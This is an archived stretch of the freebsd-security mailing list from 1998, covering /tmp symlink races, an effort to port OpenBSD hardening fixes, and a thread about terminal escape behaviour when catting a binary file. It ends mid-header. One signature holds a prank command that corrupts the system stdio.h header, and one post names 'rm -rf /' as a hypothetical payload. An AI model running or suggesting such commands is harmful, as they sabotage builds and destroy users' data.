From owner-freebsd-security Tue Sep 8 14:51:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA19660 for freebsd-security-outgoing; Tue, 8 Sep 1998 14:51:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts02-057.dublin.indigo.ie [194.125.134.187]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA19651 for ; Tue, 8 Sep 1998 14:51:26 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA00732; Tue, 8 Sep 1998 22:45:00 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199809082145.WAA00732@indigo.ie> Date: Tue, 8 Sep 1998 22:45:00 +0000 In-Reply-To: ; Nicholas Charles Brawn Reply-To: rotel@indigo.ie X-Files: The truth is out there X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: Nicholas Charles Brawn , freebsd-security@FreeBSD.ORG Subject: Re: Symlinks again... Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Apr 23, 4:09pm, Nicholas Charles Brawn wrote: } Subject: Symlinks again... > Another symlink problem. > > The script /usr/libexec/locate.updatedb and /usr/libexec/locate.mklocatedb > create predictable filenames in /tmp. Example attack is shown below. Bah, I sent in patches for this ages ago (6, 7 months?) in a PR, obviously everyone's too busy to care about security. Niall -- Niall Smart, rotel@indigo.ie. Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 8 14:59:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA21074 for freebsd-security-outgoing; Tue, 8 Sep 1998 14:59:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts02-057.dublin.indigo.ie [194.125.134.187]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA21069 for ; Tue, 8 Sep 1998 14:59:41 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA00764 for freebsd-security@freebsd.org; Tue, 8 Sep 1998 22:53:30 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199809082153.WAA00764@indigo.ie> Date: Tue, 8 Sep 1998 22:53:30 +0000 Reply-To: rotel@indigo.ie X-Files: The truth is out there X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: freebsd-security@FreeBSD.ORG Subject: oops. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org eh, ignore that last message, it a 6 month one and the relevant fixes are already in. Niall -- Niall Smart, rotel@indigo.ie. Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 9 17:42:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA19718 for freebsd-security-outgoing; Wed, 9 Sep 1998 17:42:05 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hillbilly.hayseed.net (hillbilly.hayseed.net [204.62.130.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA19700; Wed, 9 Sep 1998 17:42:03 -0700 (PDT) (envelope-from enkhyl@hayseed.net) Received: from hillbilly.hayseed.net (enkhyl@hillbilly.hayseed.net [204.62.130.2]) by hillbilly.hayseed.net (8.9.1/8.8.5) with SMTP id RAA09311; Wed, 9 Sep 1998 17:44:40 -0700 Date: Wed, 9 Sep 1998 17:44:39 -0700 (PDT) From: Enkhyl To: security@FreeBSD.ORG cc: current@FreeBSD.ORG Subject: FreeBSD Hardening Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Back when the popper buffer overflow bug sprang forth it was suggested that it might be a good idea to go through the OpenBSD change logs and evaluate security-related fixes for inclusion in FreeBSD. Is there anyone actively working on this? If there is a project organized around this, I'm willing to help out with the endeavor. Otherwise, I'm willing to embark on this endeavor and make a project out of it. Comments? -- Christopher Nielsen Scient: The Art and Science of Electronic Business cnielsen@scient.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 9 17:57:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA21983 for freebsd-security-outgoing; Wed, 9 Sep 1998 17:57:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA21957; Wed, 9 Sep 1998 17:57:48 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost.cdrom.com [127.0.0.1]) by dingo.cdrom.com (8.9.1/8.8.8) with ESMTP id SAA02559; Wed, 9 Sep 1998 18:03:55 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Message-Id: <199809100103.SAA02559@dingo.cdrom.com> X-Mailer: exmh version 2.0.2 2/24/98 To: Enkhyl cc: security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-reply-to: Your message of "Wed, 09 Sep 1998 17:44:39 PDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 09 Sep 1998 18:03:55 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Back when the popper buffer overflow bug sprang forth it was suggested > that it might be a good idea to go through the OpenBSD change logs and > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone > actively working on this? If there is a project organized around this, I'm > willing to help out with the endeavor. Otherwise, I'm willing to embark on > this endeavor and make a project out of it. There are at least a couple of people doing this on a casual basis. Having a "process owner" would probably be an excellent idea. Go do it! -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 9 19:08:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA04019 for freebsd-security-outgoing; Wed, 9 Sep 1998 19:08:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hillbilly.hayseed.net (hillbilly.hayseed.net [204.62.130.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA03998; Wed, 9 Sep 1998 19:08:21 -0700 (PDT) (envelope-from enkhyl@hayseed.net) Received: from hillbilly.hayseed.net (enkhyl@hillbilly.hayseed.net [204.62.130.2]) by hillbilly.hayseed.net (8.9.1/8.8.5) with SMTP id TAA09588; Wed, 9 Sep 1998 19:10:52 -0700 Date: Wed, 9 Sep 1998 19:10:52 -0700 (PDT) From: Enkhyl To: Mike Smith cc: security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-Reply-To: <199809100103.SAA02559@dingo.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 Sep 1998, Mike Smith wrote: > > Back when the popper buffer overflow bug sprang forth it was suggested > > that it might be a good idea to go through the OpenBSD change logs and > > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone > > actively working on this? If there is a project organized around this, I'm > > willing to help out with the endeavor. Otherwise, I'm willing to embark on > > this endeavor and make a project out of it. > > There are at least a couple of people doing this on a casual basis. > Having a "process owner" would probably be an excellent idea. > > Go do it! And away we go... I'll see if I can manage to get a mailing list together to organize the effort and divide up the work (anyone have a server I can host the list on? :-) Anyone that is casually working on this, please speak up so that we can "projectize" this. Thanks! -- Christopher Nielsen Scient: The Art and Science of Electronic Business cnielsen@scient.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 9 19:53:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA13701 for freebsd-security-outgoing; Wed, 9 Sep 1998 19:53:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [128.120.56.38]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA13687; Wed, 9 Sep 1998 19:52:57 -0700 (PDT) (envelope-from obrien@NUXI.com) Received: (from obrien@localhost) by relay.nuxi.com (8.8.8/8.6.12) id TAA04607; Wed, 9 Sep 1998 19:52:35 -0700 (PDT) Message-ID: <19980909195235.A4400@nuxi.com> Date: Wed, 9 Sep 1998 19:52:35 -0700 From: "David O'Brien" To: Enkhyl , security@FreeBSD.ORG Cc: current@FreeBSD.ORG Subject: Re: FreeBSD Hardening Reply-To: obrien@NUXI.com References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Enkhyl on Wed, Sep 09, 1998 at 05:44:39PM -0700 X-Operating-System: FreeBSD 2.2.7-STABLE Organization: The NUXI BSD group X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone see http://www.freebsd.org/auditors.html and http://www.watson.org/fbsd-hardening/index.html -- -- David (obrien@NUXI.ucdavis.edu -or- obrien@FreeBSD.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 9 23:22:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA07626 for freebsd-security-outgoing; Wed, 9 Sep 1998 23:22:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-25.igrin.co.nz [202.49.245.104]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA07602; Wed, 9 Sep 1998 23:22:33 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id PAA01986; Thu, 10 Sep 1998 15:10:30 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Thu, 10 Sep 1998 15:10:30 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Enkhyl cc: security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 Sep 1998, Enkhyl wrote: > Back when the popper buffer overflow bug sprang forth it was suggested > that it might be a good idea to go through the OpenBSD change logs and > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone > actively working on this? If there is a project organized around this, I'm > willing to help out with the endeavor. Otherwise, I'm willing to embark on > this endeavor and make a project out of it. > > Comments? I think this one got lost a bit about the point when someone tried to make an issue of the qualifications of contributors. Someone correct me if I'm wrong. To get to a point where you can declare a piece of code correct is a difficult thing to do, and is prone to getting it wrong. To find something that needs fixing generally isn't all that difficult. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 04:07:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA09265 for freebsd-security-outgoing; Thu, 10 Sep 1998 04:07:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA09260 for ; Thu, 10 Sep 1998 04:07:19 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id MAA19354 for ; Thu, 10 Sep 1998 12:07:07 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id MAA01163 for ; Thu, 10 Sep 1998 12:07:05 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Thu, 10 Sep 1998 12:07:05 +0100 (BST) From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: freebsd-security@FreeBSD.ORG Subject: Err.. cat exploit.. (!) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi All.. Was just having a look in /var/log the other day and spotted a file called sendmail.st, wondering what it was I cat'd it and here's what it did: bofh$ cat sendmail.st `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm su: xtermxterm: command not found bofh$ This seems quite scarey to me, couldn't someone embed 'rm -rf /' within a text file and then, if root cats the file it nukes their system? Here's an 'od' dump of the file, unfortunately I don't have the time to investigate this further: bofh$ od sendmail.st 0000000 130736 000001 000002 000000 177032 032616 001150 000000 0000020 000000 000000 000000 000000 000000 000000 175721 000000 0000040 000000 000000 173327 000003 000000 000000 000000 000000 0000060 000000 000000 000000 000000 000000 000000 000000 000000 * 0000200 170546 000063 000000 000000 025063 000203 000000 000000 0000220 000000 000000 000000 000000 000000 000000 000000 000000 * 0000320 000000 000000 000000 000000 000741 000000 130255 000000 0000340 000000 000000 066405 000002 000000 000000 174575 000001 0000360 000000 000000 000000 000000 000000 000000 000000 000000 * 0000460 000000 000000 000000 000000 000000 000000 007734 000000 0000500 132451 000001 000000 000000 170650 000112 000000 000000 0000520 065262 000135 000000 000000 000000 000000 000000 000000 0000540 000000 000000 000000 000000 000000 000000 000000 000000 * 0000640 000000 000000 000000 000000 000000 000000 004472 000000 0000660 000000 000000 045005 000000 000000 000000 000000 000000 0000700 000000 000000 000000 000000 000000 000000 000000 000000 * 0001140 bofh$ uname -a FreeBSD server1.fastnet.co.uk 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0: Mon Jun 22 17:33:00 BST 1998 kronus@anarchy.fast.net.uk:/usr/src/sys/compile/ANARCHY i386 Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 05:04:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA14131 for freebsd-security-outgoing; Thu, 10 Sep 1998 05:04:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from kendra.ne.mediaone.net (kendra.ne.mediaone.net [24.128.94.182]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA14126; Thu, 10 Sep 1998 05:04:28 -0700 (PDT) (envelope-from software@kew.com) Received: from sonata.hh.kew.com (root@sonata-dmz.hh.kew.com [192.168.205.1]) by kendra.ne.mediaone.net (8.8.8/8.8.8) with ESMTP id IAA10434; Thu, 10 Sep 1998 08:04:19 -0400 (EDT) (envelope-from software@kew.com) Received: from ffactory.uucp.kew.com (ffactory.hh.kew.com [192.168.203.131]) by sonata.hh.kew.com (8.9.1/8.9.1) with SMTP id IAA18208; Thu, 10 Sep 1998 08:04:17 -0400 (EDT) Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with UUCP for multiple addressees; Thu, 10 Sep 1998 08:04:17 -0500 Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with ESMTP for multiple addresses; Wed, 09 Sep 1998 23:44:09 -0500 Message-ID: <35F74B09.83E802C4@kew.com> Date: Wed, 09 Sep 1998 23:44:09 -0400 From: Drew Derbyshire Organization: Kendra Electronic Wonderworks, Stoneham, MA 02180 (http://www.kew.com) X-Mailer: Mozilla 4.05 [en] (WinNT; U) MIME-Version: 1.0 To: Enkhyl CC: Mike Smith , security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Enkhyl wrote: > And away we go... > > I'll see if I can manage to get a mailing list together to organize the > effort and divide up the work (anyone have a server I can host the list > on? :-) > > Anyone that is casually working on this, please speak up so that we can > "projectize" this. One would hope that the regular freebsd.org mail server could host it, but if not, I believe we (kew.com) can. -- Drew Derbyshire UUPC/extended e-mail: software@kew.com Telephone: 617-279-9812 "And you will always know that they existed - once. That you discovered - once. Held them in your hands - once. And then lost them - forever." -- Lon, Snakedance:3 (Dr. Who?) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 06:44:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA25439 for freebsd-security-outgoing; Thu, 10 Sep 1998 06:44:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from florence.pavilion.net (florence.pavilion.net [194.242.128.25]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA25397 for ; Thu, 10 Sep 1998 06:43:46 -0700 (PDT) (envelope-from joe@florence.pavilion.net) Received: (from joe@localhost) by florence.pavilion.net (8.8.8/8.8.8) id OAA11271; Thu, 10 Sep 1998 14:43:25 +0100 (BST) (envelope-from joe) Message-ID: <19980910144324.B831@pavilion.net> Date: Thu, 10 Sep 1998 14:43:24 +0100 From: Josef Karthauser To: Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) Mail-Followup-To: Jay Tribick , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Jay Tribick on Thu, Sep 10, 1998 at 12:07:05PM +0100 X-NCC-RegID: uk.pavilion Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 10, 1998 at 12:07:05PM +0100, Jay Tribick wrote: > > bofh$ cat sendmail.st > `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm > su: xtermxterm: command not found > bofh$ I've noticed this also. Catting some binaries (by accident of course) seems to interact with the terminal badly!! This is on an 'rxvt' running bash. Joe -- Josef Karthauser Technical Manager FreeBSD: The power to serve (http://www.uk.freebsd.org) Pavilion Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 06:44:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA25605 for freebsd-security-outgoing; Thu, 10 Sep 1998 06:44:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from peak.mountin.net ([207.227.119.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA25597 for ; Thu, 10 Sep 1998 06:44:54 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id IAA20118; Thu, 10 Sep 1998 08:44:39 -0500 (CDT) Received: from klinzhai-39.isdn.mke.execpc.com(169.207.65.167) by peak.mountin.net via smap (V1.3) id sma020116; Thu Sep 10 08:44:22 1998 Message-Id: <3.0.3.32.19980910084313.011f48f0@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Thu, 10 Sep 1998 08:43:13 -0500 To: Jay Tribick , freebsd-security@FreeBSD.ORG From: "Jeffrey J. Mountin" Subject: Re: Err.. cat exploit.. (!) In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:07 PM 9/10/98 +0100, Jay Tribick wrote: > >Hi All.. > >Was just having a look in /var/log the other day and spotted >a file called sendmail.st, wondering what it was I cat'd it >and here's what it did: > >bofh$ cat sendmail.st >`ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm >su: xtermxterm: command not found >bofh$ > >This seems quite scarey to me, couldn't someone embed 'rm -rf /' >within a text file and then, if root cats the file it nukes >their system? > >Here's an 'od' dump of the file, unfortunately I don't have the >time to investigate this further: > >bofh$ od sendmail.st --snip-- > >bofh$ uname -a >FreeBSD server1.fastnet.co.uk 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0: Mon >Jun 22 17:33:00 BST 1998 >kronus@anarchy.fast.net.uk:/usr/src/sys/compile/ANARCHY i386 It is a binary file. The sendmail.st file is used for mailer stats for sendmail ala mailstats: # mailstats Statistics from Thu Sep 3 05:10:01 1998 M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer 3 2060 6227K 45 60K 0 0 local 5 0 0K 2073 6207K 0 0 esmtp ============================================================= T 2060 6227K 2118 6267K 0 0 Terminals don't like it when you cat a binary. Jeff Mountin - Unix Systems TCP/IP networking jeff@mountin.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 06:53:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA27192 for freebsd-security-outgoing; Thu, 10 Sep 1998 06:53:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA27187 for ; Thu, 10 Sep 1998 06:53:24 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id OAA28973 for ; Thu, 10 Sep 1998 14:53:12 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id OAA01639 for ; Thu, 10 Sep 1998 14:53:10 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Thu, 10 Sep 1998 14:53:10 +0100 (BST) From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: <3.0.3.32.19980910084313.011f48f0@207.227.119.2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | >Was just having a look in /var/log the other day and spotted | >a file called sendmail.st, wondering what it was I cat'd it | >and here's what it did: | > | >bofh$ cat sendmail.st | >`ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm | >su: xtermxterm: command not found | >bofh$ | > | >This seems quite scarey to me, couldn't someone embed 'rm -rf /' | >within a text file and then, if root cats the file it nukes | >their system? | > | >Here's an 'od' dump of the file, unfortunately I don't have the | >time to investigate this further: | > | >bofh$ od sendmail.st | --snip-- | | It is a binary file. | | The sendmail.st file is used for mailer stats for sendmail ala mailstats: | | # mailstats | Statistics from Thu Sep 3 05:10:01 1998 | M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer | 3 2060 6227K 45 60K 0 0 local | 5 0 0K 2073 6207K 0 0 esmtp | ============================================================= | T 2060 6227K 2118 6267K 0 0 | | Terminals don't like it when you cat a binary. It's not the fact that it was a binary that puzzled me but that it had managed to execute a command on the shell just by me cat'ing the file. Forgot to mention that it was in an xterm and doesn't affect Virtual Consoles. Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 07:11:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA29678 for freebsd-security-outgoing; Thu, 10 Sep 1998 07:11:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from t15.tempest.sk (t15.tempest.sk [195.28.96.15]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA29661 for ; Thu, 10 Sep 1998 07:11:00 -0700 (PDT) (envelope-from ludo_koren@tempest.sk) Received: (from koren@localhost) by t15.tempest.sk (8.8.8/8.8.8) id QAA01396; Thu, 10 Sep 1998 16:04:06 +0200 (CEST) (envelope-from koren) Date: Thu, 10 Sep 1998 16:04:06 +0200 (CEST) Message-Id: <199809101404.QAA01396@t15.tempest.sk> From: Ludo Koren To: netadmin@fastnet.co.uk CC: freebsd-security@FreeBSD.ORG In-reply-to: (message from Jay Tribick on Thu, 10 Sep 1998 12:07:05 +0100 (BST)) Subject: Re: Err.. cat exploit.. (!) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "Jay" == Jay Tribick writes: Jay> Was just having a look in /var/log the other day and spotted Jay> a file called sendmail.st, wondering what it was I cat'd it sendmail maintains an ongoing record of total number and sizes of all outgoing and incoming mail messages in sendmail.st use mailstats (8) to view it. ludo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 07:24:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA02579 for freebsd-security-outgoing; Thu, 10 Sep 1998 07:24:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from kendra.ne.mediaone.net (kendra.ne.mediaone.net [24.128.94.182]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA02573 for ; Thu, 10 Sep 1998 07:24:46 -0700 (PDT) (envelope-from software@kew.com) Received: from sonata.hh.kew.com (root@sonata-dmz.hh.kew.com [192.168.205.1]) by kendra.ne.mediaone.net (8.8.8/8.8.8) with ESMTP id IAA10476; Thu, 10 Sep 1998 08:23:06 -0400 (EDT) (envelope-from software@kew.com) Received: from ffactory.uucp.kew.com (ffactory.hh.kew.com [192.168.203.131]) by sonata.hh.kew.com (8.9.1/8.9.1) with SMTP id IAA18277; Thu, 10 Sep 1998 08:23:05 -0400 (EDT) Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with UUCP for multiple addressees; Thu, 10 Sep 1998 08:23:05 -0500 Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with ESMTP for multiple addresses; Thu, 10 Sep 1998 08:23:03 -0500 Message-ID: <35F7C4A7.12C2A1C7@kew.com> Date: Thu, 10 Sep 1998 08:23:03 -0400 From: Drew Derbyshire Organization: Kendra Electronic Wonderworks, Stoneham, MA 02180 (http://www.kew.com) X-Mailer: Mozilla 4.05 [en] (WinNT; U) MIME-Version: 1.0 To: Jay Tribick CC: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jay Tribick wrote: > Was just having a look in /var/log the other day and spotted > a file called sendmail.st, wondering what it was I cat'd it > and here's what it did: Quote without comment ... MAILSTATS(8) FreeBSD System Manager's Manual MAILSTATS(8) NAME mailstats - display mail protocol statistics SYNOPSIS mailstats [-o] [-C sendmail.cf] [-f sendmail.st] DESCRIPTION Mailstats displays mail statistics on a per mailer basis. Each line of output contains the mailer number, the count and byte-count of incoming messages, the count and byte-count of outgoing messages, and the name of the mailer unless the -o flag is specified. Common mailers include smtp and local (eg: mail.local, the program which handles local delivery of mail). Statistics are read from the sendmail statistics file sendmail.st, the location of which is defined in sendmail.cf, or specified with the -f flag. Mailers are likewise defined in the sendmail.cf file. Statistics are cumulative; zero the statistics file to reset the counters. FILES /etc/sendmail.cf sendmail configuration file /var/log/sendmail.st sendmail statistics file SEE ALSO mail.local(8), sendmail(8) BSD August 13, 1996 1 of the message -- Drew Derbyshire UUPC/extended e-mail: software@kew.com Telephone: 617-279-9812 "For every bug fixed, there is a bigger bug not yet discovered." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 07:26:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA02939 for freebsd-security-outgoing; Thu, 10 Sep 1998 07:26:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from 